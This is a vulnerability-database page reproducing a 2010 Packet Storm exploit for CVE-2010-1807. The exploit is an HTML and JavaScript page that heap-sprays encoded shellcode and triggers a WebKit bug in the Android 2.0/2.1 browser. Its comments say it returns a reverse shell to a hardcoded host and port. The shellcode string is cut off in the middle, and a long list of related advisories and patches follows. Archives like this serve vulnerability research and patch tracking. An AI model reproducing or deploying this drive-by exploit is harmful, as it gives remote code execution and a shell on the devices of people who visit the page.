Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormMJ KeithPACKETSTORM:95551
HistoryNov 05, 2010 - 12:00 a.m.

Android 2.0 / 2.1 Reverse Shell Exploit

2010-11-0500:00:00
MJ Keith
packetstormsecurity.com
22

0.922 High

EPSS

Percentile

98.7%

JSON
`<html>  
<head>  
<script>  
// bug = webkit code execution CVE-2010-1807 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1807  
// listed as a safari bug but also works on android :)  
//tested = moto droid 2.0.1 , moto droid 2.1 , emulater 2.0 - 2.1  
//patched= android 2.2  
//author = mj  
// hardcoded to return a shell to 10.0.2.2 port 2222  
//  
function sploit(pop)  
{  
var span = document.createElement("div");  
document.getElementById("pwn").appendChild(span);  
span.innerHTML = pop;  
}  
function heap()  
{   
var scode = unescape("\u3c84\u0057\u3c80\u0057\u3c7c\u0057\u3c78\u0057\u3c74\u0057\u3c70\u0057\u3c6c\u0057\u3c68\u0057\u3c64\u0057\u3c60\u0057\u3c5c\u0057\u3c58\u0057\u3c54\u0057\u3c50\u0057\u3c4c\u0057\u3c48\u0057\u3c44\u0057\u3c40\u0057\u3c3c\u0057\u3c38\u0057\u3c34\u0057\u3c30\u0057\u3c2c\u0057\u3c28\u0057\u3c24\u0057\u3c20\u0057\u3c1c\u0057\u3c18\u0057\u3c14\u0057\u3c10\u0057\u3c0c\u0057\u3c08\u0057\u3c04\u0057\u3bfc\u0057\u3bfc\u0057\u3bf8\u0057\u3bf4\u0057\u3bf0\u0057\u3bec\u0057\u3be8\u0057\u3be4\u0057\u3be0\u0057\u3bdc\u0057\u3bd8\u0057\u3bd4\u0057\u3bd0\u0057\u3bcc\u0057\u3bc8\u0057\u3bc4\u0057\u3bc0\u0057\u3bbc\u0057\u3bb8\u0057\u3bb4\u0057\u3bb0\u0057\u3bac\u0057\u3ba8\u0057\u3ba4\u0057\u3ba0\u0057\u3b9c\u0057\u3b98\u0057\u3b94\u0057\u3b90\u0057\u3b8c\u0057\u3b88\u0057\u3b84\u0057\u3b80\u0057\u3b7c\u0057\u3b78\u0057\u3b74\u0057\u3b70\u0057\u3b6c\u0057\u3b68\u0057\u3b64\u0057\u3b60\u0057\u3b5c\u0057\u3b58\u0057\u3b54\u0057\u3b50\u0057\u3b4c\u0057\u3b48\u0057\u3b44\u0057\u3b40\u0057\u3b3c\u0057\u3b38\u0057\u3b34\u0057\u3b30\u0057\u3b2c\u0057\u3b28\u0057\u3b24\u0057\u3b20\u0057\u3b1c\u0057\u3b18\u0057\u3b14\u0057\u3b10\u0057\u3b0c\u0057\u3b08\u0057\u3b04\u0057\u3afc\u0057\u3afc\u0057\u3af8\u0057\u3af4\u0057\u3af0\u0057\u3aec\u0057\u3ae8\u0057\u3ae4\u0057\u3ae0\u0057\u3adc\u0057\u3ad8\u0057\u3ad4\u0057\u3ad0\u0057\u3acc\u0057\u3ac8\u0057\u3ac4\u0057\u3ac0\u0057\u3abc\u0057\u3ab8\u0057\u3ab4\u0057\u3ab0\u0057\u3aac\u0057\u3aa8\u0057\u3aa4\u0057\u3aa0\u0057\u3a9c\u0057\u3a98\u0057\u3a94\u0057\u3a90\u0057\u3a8c\u0057\u3a88\u0057\u3a84\u0057\u3a80\u0057\u3a7c\u0057\u3a78\u0057\u3a74\u0057\u3a70\u0057\u3a6c\u0057\u3a68\u0057\u3a64\u0057\u3a60\u0057\u3a5c\u0057\u3a58\u0057\u3a54\u0057\u3a50\u0057\u3a4c\u0057\u3a48\u0057\u3a44\u0057\u3a40\u0057\u3a3c\u0057\u3a38\u0057\u3a34\u0057\u3a30\u0057\u3a2c\u0057\u3a28\u0057\u3a24\u0057\u3a20\u0057\u3a1c\u0057\u3a18\u0057\u3a14\u0057\u3a10\u0057\u3a0c\u0057\u3a08\u0057\u3a04\u0057\u39fc\u0057\u39fc\u0057\u39f8\u0057\u39f4\u0057\u39f0\u0057\u39ec\u0057\u39e8\u0057\u39e4\u0057\u39e0\u0057\u39dc\u0057\u39d8\u0057\u39d4\u0057\u39d0\u0057\u39cc\u0057\u39c8\u0057\u39c4\u0057\u39c0\u0057\u39bc\u0057\u39b8\u0057\u39b4\u0057\u39b0\u0057\u39ac\u0057\u39a8\u0057\u39a4\u0057\u39a0\u0057\u399c\u0057\u3998\u0057\u3994\u0057\u3990\u0057\u398c\u0057\u3988\u0057\u3984\u0057\u3980\u0057\u397c\u0057\u3978\u0057\u3974\u0057\u3970\u0057\u396c\u0057\u3968\u0057\u3964\u0057\u3960\u0057\u395c\u0057\u3958\u0057\u3954\u0057\u3950\u0057\u394c\u0057\u3948\u0057\u3944\u0057\u3940\u0057\u393c\u0057\u3938\u0057\u3934\u0057\u3930\u0057\u392c\u0057\u3928\u0057\u3924\u0057\u3920\u0057\u391c\u0057\u3918\u0057\u3914\u0057\u3910\u0057\u390c\u0057\u3908\u0057\u3904\u0057\u38fc\u0057\u38fc\u0057\u38f8\u0057\u38f4\u0057\u38f0\u0057\u38ec\u0057\u38e8\u0057\u38e4\u0057\u38e0\u0057\u38dc\u0057\u38d8\u0057\u38d4\u0057\u38d0\u0057\u38cc\u0057\u38c8\u0057\u38c4\u0057\u38c0\u0057\u38bc\u0057\u38b8\u0057\u38b4\u0057\u38b0\u0057\u38ac\u0057\u38a8\u0057\u38a4\u0057\u38a0\u0057\u389c\u0057\u3898\u0057\u3894\u0057\u3890\u0057\u388c\u0057\u3888\u0057\u3884\u0057\u3880\u0057\u387c\u0057\u3878\u0057\u3874\u0057\u3870\u0057\u386c\u0057\u3868\u0057\u3864\u0057\u3860\u0057\u385c\u0057\u3858\u0057\u3854\u0057\u3850\u0057\u384c\u0057\u3848\u0057\u3844\u0057\u3840\u0057\u383c\u0057\u3838\u0057\u3834\u0057\u3830\u0057\u382c\u0057\u3828\u0057\u3824\u0057\u3820\u0057\u381c\u0057\u3818\u0057\u3814\u0057\u3810\u0057\u380c\u0057\u3808\u0057\u3804\u0057\u37fc\u0057\u37fc\u0057\u37f8\u0057\u37f4\u0057\u37f0\u0057\u37ec\u0057\u37e8\u0057\u37e4\u0057\u37e0\u0057\u37dc\u0057\u37d8\u0057\u37d4\u0057\u37d0\u0057\u37cc\u0057\u37c8\u0057\u37c4\u0057\u37c0\u0057\u37bc\u0057\u37b8\u0057\u37b4\u0057\u37b0\u0057\u37ac\u0057\u37a8\u0057\u37a4\u0057\u37a0\u0057\u379c\u0057\u3798\u0057\u3794\u0057\u3790\u0057\u378c\u0057\u3788\u0057\u3784\u0057\u3780\u0057\u377c\u0057\u3778\u0057\u3774\u0057\u3770\u0057\u376c\u0057\u3768\u0057\u3764\u0057\u3760\u0057\u375c\u0057\u3758\u0057\u3754\u0057\u3750\u0057\u374c\u0057\u3748\u0057\u3744\u0057\u3740\u0057\u373c\u0  
do {  
scode += scode;  
} while(scode.length < 0x1000);  
target = new Array();  
for(i = 0; i < 1000; i++)  
target[i] = scode;  
for (i = 0; i <= 1000; i++)  
{  
if (i>999)  
{  
sploit(-parseFloat("NAN(ffffe00572c60)"));  
}  
document.write("The targets!! " + target[i]);  
document.write("<br />");  
}  
}  
</script>  
</head>  
<body id="pwn">  
woot  
<script>  
heap();  
</script>  
</body>  
</html>  
  
`

Related

veracode 1
seebug 4
cve 1
checkpoint_advisories 2
threatpost 2
android 1
prion 1
canvas 1
packetstorm 1
exploitpack 2
debiancve 1
ubuntucve 1
exploitdb 2
nessus 13
openvas 19
securityvulns 2
freebsd 1
redhat 1
oraclelinux 1
fedora 4
gentoo 1
veracode
veracode
Denial Of Service (DoS)
2020-04-10 00:53:17
seebug
seebug
Android 2.0/2.1 - Use-After-Free Remote Code Execution on Webkit
2014-07-01 00:00:00
Android 2.0/2.1 Use-After-Free Remote Code Execution on Webkit
2010-11-17 00:00:00
Android 2.0-2.1 - Reverse Shell Exploit
2014-07-01 00:00:00
cve
cve
CVE-2010-1807
2010-09-10 19:00:00
checkpoint_advisories
checkpoint_advisories
Apple Safari Webkit Floating Point Data Type Code Execution - Ver2 (CVE-2010-1807)
2014-01-07 00:00:00
Apple Safari Webkit Use-After-Free Code Execution- Ver2 (CVE-2010-1807)
2014-01-28 00:00:00
threatpost
threatpost
Researcher Publishes Android Browser Exploit
2010-11-08 15:26:31
Apple Plugs Safari Drive-by Download Security Holes
2010-09-08 13:57:18
android
android
Use-After-Free Remote
2010-11-14 00:00:00
prion
prion
Design/Logic Flaw
2010-09-10 19:00:00
canvas
canvas
Immunity Canvas: CVE_2010_1807
2010-09-10 19:00:00
packetstorm
packetstorm
Android 2.0 / 2.1 Use-After-Free Remote Code Execution
2010-11-16 00:00:00
exploitpack
exploitpack
Google Android 2.02.1 - Use-After-Free Remote Code Execution on Webkit
2010-11-15 00:00:00
Google Android 2.0 2.1 - Code Execution (Reverse Shell 10.0.2.2:2222TCP)
2010-11-05 00:00:00
debiancve
debiancve
CVE-2010-1807
2010-09-10 19:00:00
ubuntucve
ubuntucve
CVE-2010-1807
2010-09-10 00:00:00
exploitdb
exploitdb
Google Android 2.0/2.1 - Use-After-Free Remote Code Execution on Webkit
2010-11-15 00:00:00
Google Android 2.0 &lt; 2.1 - Code Execution (Reverse Shell 10.0.2.2:2222/TCP)
2010-11-05 00:00:00
nessus
nessus
Mac OS X : Apple Safari < 5.0.2 / 4.1.2
2010-09-08 00:00:00
Safari < 5.0.2 Multiple Vulnerabilities
2010-09-08 00:00:00
Fedora 13 : webkitgtk-1.2.5-1.fc13 (2010-15957)
2010-10-20 00:00:00
openvas
openvas
Apple Safari Multiple Vulnerabilities (Sep 2010)
2010-09-15 00:00:00
Apple Safari Multiple Vulnerabilities - Sep10
2010-09-15 00:00:00
FreeBSD Ports: webkit-gtk2
2010-11-17 00:00:00
securityvulns
securityvulns
About the security content of Safari 5.0.2 and Safari 4.1.2
2010-09-14 00:00:00
Apple WebKit / Safari multiple security vulnerabilities
2010-09-14 00:00:00
freebsd
freebsd
Webkit-gtk2 -- Multiple Vulnabilities
2010-10-01 00:00:00
redhat
redhat
(RHSA-2011:0177) Moderate: webkitgtk security update
2011-01-25 00:00:00
oraclelinux
oraclelinux
webkitgtk security update
2011-02-10 00:00:00
fedora
fedora
[SECURITY] Fedora 12 Update: webkitgtk-1.2.5-1.fc12
2010-10-19 07:09:06
[SECURITY] Fedora 13 Update: webkitgtk-1.2.5-1.fc13
2010-10-19 07:21:56
[SECURITY] Fedora 13 Update: webkitgtk-1.2.6-1.fc13
2011-01-07 20:01:55
gentoo
gentoo
Multiple packages, Multiple vulnerabilities fixed in 2011
2014-12-11 00:00:00

0.922 High

EPSS

Percentile

98.7%

JSON
Related for PACKETSTORM:95551
veracode1seebug4cve1checkpoint_advisories2threatpost2android1prion1canvas1packetstorm1exploitpack2debiancve1ubuntucve1exploitdb2nessus13openvas19securityvulns2freebsd1redhat1oraclelinux1fedora4gentoo1